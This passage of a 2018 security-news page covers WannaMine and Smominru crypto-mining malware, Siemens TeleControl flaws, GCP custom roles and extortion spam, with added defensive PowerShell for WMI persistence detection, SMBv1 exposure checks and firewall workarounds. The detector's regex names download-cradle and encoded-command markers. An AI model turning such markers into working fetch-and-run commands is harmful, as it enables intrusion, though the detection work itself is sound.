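    # __FilterToConsumerBinding stores Filter/Consumer as references. Depending on
    # the cmdlet and PowerShell version they surface as CimInstance objects or as
    # path strings such as __EventFilter.Name="foo"; handle both forms.
    param($Ref)
    if ($null -eq $Ref) { return $null }
    if ($Ref -is [string]) { return ($Ref -split '"')[1] }
    return $Ref.Name
}

function Find-SuspiciousWmiSubscription {
    [CmdletBinding()]
    param(
        # Heuristic: PowerShell launched from WMI with an encoded command or a
        # download cradle is the pattern described for WannaMine.
        [string]$Pattern = 'powershell|-enc|-e\s|FromBase64String|DownloadString|IEX|Invoke-Expression'
    )
    $ns = 'root/subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
    # __EventConsumer is the abstract base class, so this returns every consumer type
    # (CommandLineEventConsumer, ActiveScriptEventConsumer, ...) in one query.
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)

    foreach ($b in $bindings) {
        $fName    = Get-WmiSubscriptionName $b.Filter
        $cName    = Get-WmiSubscriptionName $b.Consumer
        $filter   = $filters   | Where-Object Name -eq $fName | Select-Object -First 1
        $consumer = $consumers | Where-Object Name -eq $cName | Select-Object -First 1

        # What the consumer would actually run; properties not present on a given
        # consumer class simply evaluate to $null.
        $payload = if ($consumer.CommandLineTemplate) { $consumer.CommandLineTemplate }
                   elseif ($consumer.ScriptText)     { $consumer.ScriptText }
                   else { $consumer.ExecutablePath }

        [pscustomobject]@{
            Filter       = $fName
            Query        = $filter.Query          # WQL trigger, often a timer-style query
            Consumer     = $cName
            ConsumerType = $consumer.CimClass.CimClassName
            Payload      = $payload
            Suspicious   = [bool]($payload -match $Pattern)
        }
    }
}

function Remove-WmiSubscription {
    # Removal is explicit and opt-in: SCCM, backup agents and other admin tools
    # also register permanent subscriptions, so review the listing first.
    param([Parameter(Mandatory)][string]$FilterName,
          [Parameter(Mandatory)][string]$ConsumerName)
    $ns = 'root/subscription'
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Where-Object { (Get-WmiSubscriptionName $_.Filter) -eq $FilterName -and
                       (Get-WmiSubscriptionName $_.Consumer) -eq $ConsumerName } |
        Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventFilter   | Where-Object Name -eq $FilterName   | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer | Where-Object Name -eq $ConsumerName | Remove-CimInstance
}

# Usage: list everything, inspect the flagged rows, and only then remove.
Find-SuspiciousWmiSubscription | Format-Table -AutoSize -Wrap
# Find-SuspiciousWmiSubscription | Where-Object Suspicious |
#     ForEach-Object { Remove-WmiSubscription $_.Filter $_.Consumer }
```

Run it as administrator on each suspect host; a binding whose filter is a timer-style query and whose consumer launches powershell.exe with an encoded command or a DownloadString call is the pattern to treat as hostile. The same three queries can be scheduled or fed into endpoint telemetry so that a newly created subscription is noticed when it appears rather than weeks later.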

The malware targets all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003. However, it uses different files and commands for Windows Vista and newer platform iterations.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” the security company notes.

As Sophos points out, organizations that find the WannaMine malware in their network are also at risk of other malware, including ransomware. It is not uncommon to find multiple malware families on machines that have been compromised once.

Designed to mine for Monero, not to steal user information or crypto-coins, WannaMine would still slow down the infected machines. Laptops could even be damaged, if the malware runs on them continuously for several hours, as the device gets hotter. Also, the battery is drained faster than usual, Sophos points out.

An antivirus application should keep users protected from this malware family. Keeping systems up to date (in particular with the MS17-010 patch that closes the EternalBlue vulnerability) and using strong, unique passwords should also help avoid a WannaMine infection, since the worm spreads with stolen credentials as well as with the exploit.
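Both WannaMine articles on this page name the same two doors: SMBv1 on TCP 445 for EternalBlue, and credentials harvested from LSASS for the Mimikatz path. The PowerShell below is an added example (not from CrowdStrike, Sophos or Microsoft) that reports whether each door is open on a host and, with -Harden, closes the ones that can be closed safely. Assumptions: it reads the SMBv1 server state via Get-SmbServerConfiguration where that cmdlet exists (Windows 8/Server 2012 and later) and via the LanmanServer SMB1 registry value documented in KB2696547 elsewhere; the credential-theft part reads the RunAsPPL and WDigest UseLogonCredential values. It does not verify that MS17-010 is installed, because the relevant KB numbers differ per OS build and are superseded by later cumulative updates; check that against your patch-management inventory.

```powershell
# Exposure check for the two propagation paths WannaMine uses: EternalBlue over
# SMBv1 and Mimikatz-style credential theft. Added example, not CrowdStrike's or
# Sophos' tooling. Read-only unless -Harden is passed; run as administrator.

function Get-WannaMineExposure {
    [CmdletBinding()]
    param([switch]$Harden)

    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $lsa    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $wdig   = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # 1. SMBv1 server. Get-SmbServerConfiguration exists on Windows 8/2012+;
    #    older builds use the registry value from KB2696547 (SMB1 = 0 disables the
    #    SMB1 server; the value is absent by default, which means enabled).
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        $smb1 = (Get-SmbServerConfiguration).EnableSMB1Protocol
    } else {
        $v = (Get-ItemProperty -Path $lanman -Name SMB1 -ErrorAction SilentlyContinue).SMB1
        $smb1 = ($null -eq $v) -or ($v -ne 0)
    }

    # 2. Which enabled inbound firewall rules explicitly allow TCP 445?
    #    (Rules with LocalPort "Any" are not listed; review those separately.)
    $smbAllow = @()
    if (Get-Command Get-NetFirewallRule -ErrorAction SilentlyContinue) {
        $smbAllow = Get-NetFirewallRule -Enabled True -Direction Inbound -Action Allow |
            Where-Object { ($_ | Get-NetFirewallPortFilter).LocalPort -contains '445' } |
            Select-Object -ExpandProperty DisplayName
    }

    # 3. Credential-theft mitigations that blunt Mimikatz:
    #    RunAsPPL=1 runs LSASS as a protected process (Windows 8.1/2012 R2+);
    #    UseLogonCredential=0 stops WDigest caching plaintext passwords (KB2871997).
    $runAsPpl = (Get-ItemProperty -Path $lsa  -Name RunAsPPL           -ErrorAction SilentlyContinue).RunAsPPL
    $wdigest  = (Get-ItemProperty -Path $wdig -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential

    $report = [pscustomobject]@{
        SMB1ServerEnabled        = [bool]$smb1
        InboundRulesAllowing445  = @($smbAllow)
        LsassProtected           = ($runAsPpl -eq 1)
        WDigestPlaintextDisabled = ($wdigest -eq 0)
    }

    if ($Harden) {
        if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
            Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        } else {
            Set-ItemProperty -Path $lanman -Name SMB1 -Type DWord -Value 0   # takes effect after reboot
        }
        New-ItemProperty -Path $wdig -Name UseLogonCredential -PropertyType DWord -Value 0 -Force | Out-Null
        # RunAsPPL is deliberately not toggled here: it breaks third-party LSA
        # plugins that are not signed for PPL, so enable it only after testing.
    }
    return $report
}

Get-WannaMineExposure | Format-List
# Get-WannaMineExposure -Harden   # after confirming nothing on the host still needs SMBv1
```

The report is the useful part for a fleet: run it across hosts and anything that shows SMB1ServerEnabled true together with an allow rule for 445 is reachable by the exploit path, while hosts with WDigest plaintext still enabled are where a single compromised admin logon yields reusable passwords for the credential path.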


Google Adds Custom Roles Feature to Cloud IAM
1.2.2018 securityweek IT
The Identity & Access Management (IAM) service in the Google Cloud Platform (GCP) now includes a feature that allows users to assign custom roles for finer-grained security.

The custom roles feature was first announced back in October when the beta version was introduced. The tech giant announced on Wednesday that nearly all permissions can now be customized.

Granting users excessive privileges to services, applications and data can introduce serious security risks, which is why it’s crucial for administrators to ensure that users only have the permissions needed to perform their jobs.

Customers of Google’s cloud platform now have full control over more than 1,200 public permissions, giving them fine-grained access control for enforcing the principle of least privilege, under which each user or service identity receives only the privileges its job requires.

In the case of GCP, administrators can rely on the IAM service to assign a predefined role to users – for example, allow them to view or modify data stored in the cloud. However, predefined roles bundle permissions in a fixed way and are sometimes too coarse for implementing the principle of least privilege.

Custom roles, on the other hand, can be used to remix permissions across all services so that users receive no privileges other than those required to do their job.

“Consider a tool that needs access to multiple GCP services to inventory Cloud Storage buckets, BigQuery tables and Cloud Spanner databases. Enumerating data doesn’t require privileges to decrypt that data. While predefined roles to view an entire project may grant .query, .decrypt and .get as a set, custom roles make it possible to grant .get permission on its own,” Google’s Rohit Khare and Pradeep Madhavarapu explained in a blog post.

Except for certain permissions that are only supported in predefined roles, all permissions are now customizable. A list of all supported permissions has been made available and users can keep track of changes via a central change log.
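To make the inventory example from the blog post concrete: the PowerShell below drives the gcloud CLI to create a custom role that can enumerate Cloud Storage buckets, BigQuery tables and Cloud Spanner databases without any permission that reads or decrypts data, then reads the role back and fails if GCP stored something broader. This is an added example, not Google’s code; the project ID, role ID and service-account name are placeholders, and the exact permission set is our assumption of what a metadata-only inventory needs (gcloud iam list-testable-permissions on the project lists the full catalogue of customizable permissions mentioned above).

```powershell
# Least-privilege inventory role with gcloud, driven from PowerShell.
# Added example, not Google's code. $ProjectId, $RoleId and $Member are
# placeholders; the permission list is our assumption of what a read-only
# inventory of Storage buckets, BigQuery tables and Spanner databases needs.

$ProjectId = 'example-project'                                             # placeholder
$RoleId    = 'dataInventoryViewer'                                         # placeholder; [a-zA-Z0-9_.]{3,64}
$Member    = "serviceAccount:inventory@$ProjectId.iam.gserviceaccount.com" # placeholder

# Metadata only: list/get, no *.getData and no cloudkms.*.decrypt.
$RoleDefinition = @"
title: Data Inventory Viewer
description: Enumerates Storage buckets, BigQuery tables and Spanner databases without reading data
stage: GA
includedPermissions:
- storage.buckets.list
- storage.buckets.get
- bigquery.datasets.get
- bigquery.tables.list
- bigquery.tables.get
- spanner.instances.list
- spanner.databases.list
"@

function New-InventoryRole {
    # gcloud reads the role from a YAML file; write the definition to a temp file.
    $file = Join-Path ([IO.Path]::GetTempPath()) "$RoleId.yaml"
    Set-Content -Path $file -Value $RoleDefinition -Encoding ascii
    gcloud iam roles create $RoleId --project=$ProjectId --file=$file
    if ($LASTEXITCODE -ne 0) { throw "role creation failed for $RoleId" }
}

function Test-InventoryRole {
    # Read back what GCP actually stored and flag anything that can read data,
    # decrypt, change IAM policy, or mutate resources. The regex is our own
    # heuristic, not a Google API. value() joins list items with ';'.
    $perms     = gcloud iam roles describe $RoleId --project=$ProjectId --format='value(includedPermissions)'
    $granted   = @("$perms" -split ';' | Where-Object { $_ })
    $dangerous = $granted | Where-Object { $_ -match '\.(getData|decrypt|setIamPolicy|delete|create|update)$' }
    [pscustomobject]@{ Granted = $granted; Violations = @($dangerous) }
}

function Grant-InventoryRole {
    # Bind the custom role (not a predefined one) to the inventory service account.
    gcloud projects add-iam-policy-binding $ProjectId --member=$Member --role="projects/$ProjectId/roles/$RoleId"
}

New-InventoryRole
$check = Test-InventoryRole
$check | Format-List
if ($check.Violations.Count -eq 0) { Write-Host 'Role is metadata-only; safe to bind with Grant-InventoryRole' }
# Grant-InventoryRole   # bind only once the check above reports no violations
```

Creating the role needs iam.roles.create on the project. Test-InventoryRole deliberately inspects the role as stored rather than the YAML you wrote, so that a typo that resolves to a broader permission is caught, and the binding is left commented out until that check is clean.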

In the future, Google wants to further enhance its IAM service, including by using research from the company’s Forseti open source initiative to help explain why a specific permission has been granted or denied.


Siemens fixed three flaws in plant management product Siemens TeleControl Basic system
1.2.2018 securityaffairs Vulnerability

Siemens has patched three security vulnerabilities in its Plant Management Product, the Siemens TeleControl Basic system.
The system is used in water treatment facilities, traffic monitoring systems, and energy distribution plants. The TeleControl Basic control center runs the TeleControl Server Basic software. The Siemens TeleControl Basic system allows organizations to monitor and control processes in industrial environments and in the operation of municipal facilities.

The TeleControl Server Basic software is affected by three vulnerabilities that could be exploited by an attacker to escalate privileges, bypass authentication, and cause denial-of-service (DoS) conditions.

“The latest update for TeleControl Server Basic resolves three vulnerabilities. One of these vulnerabilities could allow an authenticated attacker with network access to escalate his privileges and perform administrative actions.” reads the security advisory published by Siemens.

“Siemens recommends updating to the new version.”

This is the first security advisory released by Siemens and ICS-CERT for vulnerabilities specific to TeleControl products.

The flaws affect TeleControl Server Basic versions prior to V3.1, the most severe one is tracked as CVE-2018-4836 and rated high severity.

Below is the list of the vulnerabilities and their descriptions:

Vulnerability (CVE-2018-4835) [CVSS v3.0 Base Score 5.3] – It could be exploited by an attacker with network access to the TeleControl Server Basic’s port 8000/tcp to bypass the authentication mechanism and access limited information.
Vulnerability (CVE-2018-4836) [CVSS v3.0 Base Score 8.8] – It could be exploited by an authenticated attacker with a low-privileged account and access to the TeleControl Server Basic’s port 8000/tcp to escalate privileges and perform administrative operations.
Vulnerability (CVE-2018-4837) [CVSS v3.0 Base Score 5.3] – It could be exploited by an attacker with access to the TeleControl Server Basic’s web server (port 80/tcp or 443/tcp) to cause a DoS condition on the web server; other functionality is not affected.

Siemens also provided workarounds to mitigate the risk of attacks: blocking TCP port 8000 through the Windows firewall for CVE-2018-4835 and CVE-2018-4836, and blocking TCP ports 80 and 443 for CVE-2018-4837.

The US ICS-CERT also published a detailed advisory for the vulnerabilities in the Siemens TeleControl Basic.


Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit
1.2.2018 thehackernews Virus

2017 was the year of high profile data breaches and ransomware attacks, but from the beginning of this year, we are noticing a faster-paced shift in the cyber threat landscape, as cryptocurrency-related malware is becoming a popular and profitable choice of cyber criminals.
Several cybersecurity firms are reporting new cryptocurrency-mining malware that is being spread using EternalBlue, the same NSA exploit that was leaked by the hacking group Shadow Brokers and used by the devastating WannaCry ransomware.
Researchers from Proofpoint discovered a massive global botnet dubbed "Smominru," a.k.a Ismo, that is using EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers to secretly mine Monero cryptocurrency, worth millions of dollars, for its master.
Active since at least May 2017, Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows, according to the researchers.
"Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz," the researchers said.
The botnet operators have already mined approximately 8,900 Monero, valued at up to $3.6 million, at a rate of roughly 24 Monero per day ($8,500), by stealing the computing resources of more than half a million systems.

The highest numbers of Smominru infections have been observed in Russia, India, and Taiwan, the researchers said.
The command and control infrastructure of the Smominru botnet is hosted on the DDoS protection service SharkTech, which was notified of the abuse but reportedly ignored the notifications.
According to the Proofpoint researchers, the cybercriminals are using at least 25 machines to scan the internet for vulnerable Windows computers, and are also using the leaked NSA RDP exploit EsteemAudit (CVE-2017-0176) for infection.
"As Bitcoin has become prohibitively resource-intensive to mine outside of dedicated mining farms, interest in Monero has increased dramatically. While Monero can no longer be mined effectively on desktop computers, a distributed botnet like that described here can prove quite lucrative for its operators," the researchers concluded.
"The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations. Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes."
Another security firm, CrowdStrike, recently published a blog post reporting another widespread fileless cryptocurrency-mining malware, dubbed WannaMine, that uses the EternalBlue exploit to infect computers and mine Monero.
Because it does not drop an executable on the infected computer, WannaMine infections are harder for antivirus programs to detect. CrowdStrike researchers observed that the malware has rendered "some companies unable to operate for days and weeks at a time."
Besides infecting systems, cybercriminals are also widely adopting cryptojacking attacks, in which browser-based JavaScript miners use website visitors' CPU power to mine cryptocurrencies.
Since the recently observed cryptocurrency-mining malware attacks leverage EternalBlue, which Microsoft patched in March 2017 (MS17-010), users are advised to keep their systems and software updated to avoid becoming victims of such threats.


Siemens Patches Flaws in Plant Management Product
1.2.2018 securityweek Vulnerability
Siemens has informed customers that a component of its TeleControl Basic product is affected by several vulnerabilities that can be exploited by an attacker to escalate privileges, bypass authentication, and launch denial-of-service (DoS) attacks.

Siemens’ TeleControl Basic system allows organizations to monitor and control plant processes. The solution can also be used to optimize the operation of municipal facilities, including water treatment, traffic monitoring, and energy distribution. TeleControl Server Basic is the software used for the TeleControl Basic control center.

According to advisories published by Siemens and ICS-CERT, the TeleControl Server Basic system is affected by a total of three vulnerabilities. The most serious of them, tracked as CVE-2018-4836 and rated high severity, allows an attacker with a low privileged account and access to TCP port 8000 to escalate privileges and perform administrative tasks.

Another flaw, CVE-2018-4835, allows an attacker with network access to port 8000 to bypass the system’s authentication mechanism and obtain limited information.

The last security hole, CVE-2018-4837, can be exploited by an attacker with access to the TeleControl web server on TCP ports 80 or 443 to cause the web server to enter a DoS condition. However, Siemens pointed out that the DoS condition does not affect other functionality.

CVE-2018-4835 and CVE-2018-4837 have been classified as medium severity with a CVSS score of 5.3.

Siemens has patched the vulnerabilities with the release of TeleControl Server Basic 3.1. In addition, the company has identified some workarounds and mitigations that can be used to reduce the risk of attacks.

These include blocking TCP port 8000 using the Windows firewall to mitigate CVE-2018-4835 and CVE-2018-4836, and blocking ports 80 and 443 to prevent attacks involving CVE-2018-4837.
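The workaround in both Siemens advisories on this page is a firewall rule on the host running TeleControl Server Basic. The PowerShell below is an added example, not Siemens’ code: one function creates those rules on a Windows 8/Server 2012 or later host using the NetSecurity cmdlets (the rule names are ours), and a second verifies which enabled rules currently block or allow 8000, 80 and 443. Two caveats a practitioner will want: blocking 8000/tcp also cuts off legitimate TeleControl stations on the network, so this is an interim measure until the V3.1 update is installed, and blocking 80/443 removes the web interface entirely, which is why it sits behind a switch.

```powershell
# Interim workaround for TeleControl Server Basic < V3.1 as described in the
# advisory: block 8000/tcp (CVE-2018-4835/-4836) and, optionally, 80/443
# (CVE-2018-4837) at the Windows firewall. Added example, not Siemens' code.
# Rule names are ours. Run as administrator on the control-center host;
# requires the NetSecurity module (Windows 8 / Server 2012 and later).

function Set-TeleControlWorkaround {
    [CmdletBinding()]
    param(
        [int[]]$ControlPorts = @(8000),   # TeleControl protocol port per the advisory
        [switch]$BlockWebServer,          # also block 80/443; kills the web UI
        [switch]$Remove                   # undo after updating to V3.1
    )
    $ports = $ControlPorts
    if ($BlockWebServer) { $ports += 80, 443 }

    foreach ($p in $ports) {
        $name     = "TeleControl workaround - block TCP $p inbound"
        $existing = Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue
        if ($Remove) {
            if ($existing) { Remove-NetFirewallRule -DisplayName $name }
            continue
        }
        if (-not $existing) {
            # Block rules take precedence over allow rules in Windows Firewall, so
            # this overrides any product-installed allow rule for the same port.
            New-NetFirewallRule -DisplayName $name -Direction Inbound -Protocol TCP `
                -LocalPort $p -Action Block -Profile Any -Enabled True | Out-Null
        }
    }
}

function Get-TeleControlWorkaroundState {
    # Verification: for each port, is there an enabled inbound block and/or allow rule?
    foreach ($p in 8000, 80, 443) {
        $rules = Get-NetFirewallRule -Enabled True -Direction Inbound |
            Where-Object { ($_ | Get-NetFirewallPortFilter).LocalPort -contains "$p" }
        [pscustomobject]@{
            Port    = $p
            Blocked = [bool]($rules | Where-Object Action -eq 'Block')
            Allowed = [bool]($rules | Where-Object Action -eq 'Allow')
        }
    }
}

Set-TeleControlWorkaround                     # blocks 8000 only
Get-TeleControlWorkaroundState | Format-Table -AutoSize
# Set-TeleControlWorkaround -BlockWebServer   # only if the web interface can be spared
# Set-TeleControlWorkaround -Remove           # after updating to TeleControl Server Basic V3.1
```

Confirm the effect from a second machine with Test-NetConnection -ComputerName <host> -Port 8000, which should now report TcpTestSucceeded False; a Blocked row that is still False means the rule was created in a profile the active network interface is not using.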

While this is the first advisory released by Siemens and ICS-CERT for a vulnerability specific to TeleControl products, a privilege escalation flaw disclosed in November 2016 had been found to impact TeleControl Server Basic – among many other industrial solutions from Siemens. That security hole was addressed in TeleControl Server Basic with the release of version 3.0.


Mining Smominru botnet used NSA exploit to infect more than 526,000 systems
1.2.2018 securityaffairs BigBrothers

Researchers from Proofpoint discovered a huge botnet dubbed ‘Smominru’ that is using the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities.
Cyber attacks involving cryptocurrencies continue to grow, and malware authors are focusing their efforts on the development of cryptocurrency-mining malware.

Recently security experts observed cryptocurrency miners leveraging the NSA EternalBlue SMB exploit (CVE-2017-0144) as spreading mechanism.

In August 2017, a new fileless miner dubbed CoinMiner appeared in the wild; it used the NSA EternalBlue exploit and WMI to spread.

Now researchers from Proofpoint have discovered a huge botnet dubbed ‘Smominru’ (aka Ismo) that is using the EternalBlue exploit (CVE-2017-0144) to infect Windows computers and recruit them into Monero cryptocurrency mining activities.

“Because obtaining these cryptocurrencies through legitimate mining mechanisms is quite resource-intensive, cybercriminals are stealing them, demanding ransomware payments in them, and harnessing other computers to mine them for free. Recently, Proofpoint researchers have been tracking the massive Smominru botnet, the combined computing power of which had earned millions of dollars for its operators,” states the analysis published by Proofpoint.

With the help of Abuse.CH and the ShadowServer Foundation, Proofpoint conducted a sinkholing operation that allowed it to profile the botnet.

The command and control infrastructure of the Smominru botnet is hosted on the DDoS protection service SharkTech; Proofpoint promptly reported the abuse to the provider but received no response.

According to the researchers, the Smominru botnet has been active at least since May 2017 and has already infected more than 526,000 Windows computers.

Most of the infected systems are servers, distributed worldwide but concentrated in Russia, India, and Taiwan. It is a profitable business: the operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).
“Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz,” the researchers said. “The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week (Figure 2).”

The researchers at Proofpoint discovered that the crooks are using at least 25 hosts to scan the Internet for Windows computers vulnerable to EternalBlue, and are also leveraging the NSA RDP exploit EsteemAudit (CVE-2017-0176) to compromise target machines.

The scanning hosts all appear to sit in the autonomous system AS63199; further technical details and the IoCs are included in the analysis published by Proofpoint.

“Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity. The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations,” Proofpoint concluded.

“Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes. We also expect botnets like that described here to become more common and to continue growing in size.”


Every little bitcoin helps
1.2.2018 Kaspersky Spam
It often happens that inventions and technologies that start out good end up turning into dangerous tools in the hands of criminals. Blockchain is no exception to this rule, especially in its most common cryptocurrency incarnation. Cryptocurrencies crop up in all kinds of spam: from traditional advertising (courses about investment and trade) to more fraudulent and malicious varieties. Quite often, cryptocurrencies are used by attackers as originally intended — as a means of payment (albeit from victims). We found and delved into several spam mailings in which cybercrooks exploited user paranoia about information threats and took bitcoins as payment for peace of mind. The attacks targeted employees of small companies, but such emails could be sent to any user’s personal mail.

In the first email, the attacker claimed to have installed malware on a porn site visited by the victim, and to be in possession of several videos recorded from both the device screen and cameras; not only that, a keylogger had supposedly provided access to the user’s IM, email, and social media contacts. To get the attacker off their back, the victim was asked to transfer the equivalent of $320 to the bitcoin wallet specified in the email. It was also mentioned that a built-in tracking pixel would inform the attacker that the email had been seen. And if the recipient wanted proof of that, they should reply to the message, whereupon the compromising info would be sent out to five of their contacts. As a postscript, the scammer warned against going to the police: he allegedly lived in Belarus, so the investigation would drag on for years.
 

The next email was wordy but imaginative, written by a hacker by the name of Andrey. The attacker informed the recipient that he had studied the latter’s company, together with its employees and their relatives, found weaknesses, and was planning to ruin it. The author listed no fewer than seven ways to achieve this goal, from simply writing negative reviews on various websites to creating fake company reports in his garage(!) and sending them to government departments. However, the hacker’s preferred outcome was for the company to see sense and transfer 3 bitcoins to his wallet. Like the previous email, it specifically mentioned not going to the cops, since “Andrey” lived in Ukraine.
 

Another email was the work of not one hacker, but an entire chain gang. The attackers allegedly had hacked the company’s server and got hold of information about its clients, bank accounts, tax payments, etc. Now they were threatening to damage the company’s reputation by publishing this information online. It was also stated that at some unspecified moment they would launch an attack on the company’s servers and computers, encrypting all data. To call off the attack, the blackmailers demanded 0.5 bitcoin. If the cryptopayment was not made before the start of the attack, the amount would rise to 2 bitcoins.
 

Sadly and (perhaps) surprisingly, some people still fall for such concoctions. The targets of these mailings are usually small companies that lack the resources for decent anti-spam protection and basic information security training for staff. So let us reiterate: be vigilant, stay calm, and take anonymous threats of this kind with a pinch of salt.


Cybercriminals target early IRS 2018 refunds now
1.2.2018 Kaspersky CyberCrime
Where is my tax refund? Wait! What are those fraudulent charges on my credit card??
On Monday, January 29, the IRS officially opened its 2018 filing season. Some taxpayers have already filed their returns, and cybercriminals know it too. Just two days after the official opening of the 2018 season, we received phishing messages leading to fake refund-status websites:


The link in the email leads to a hacked Brazilian restaurant website, which redirects to a website in the Australian domain zone.


So the whole scheme is to steal the credit card information of taxpayers expecting a tax refund from the IRS. Both URLs are now blocked by Kaspersky Anti-Phishing.

The website mentioned above had been hacked and contains an old webshell, uploaded back in 2016.


Should we expect more campaigns like this? Definitely yes. Stay watchful and don’t lose your refunds!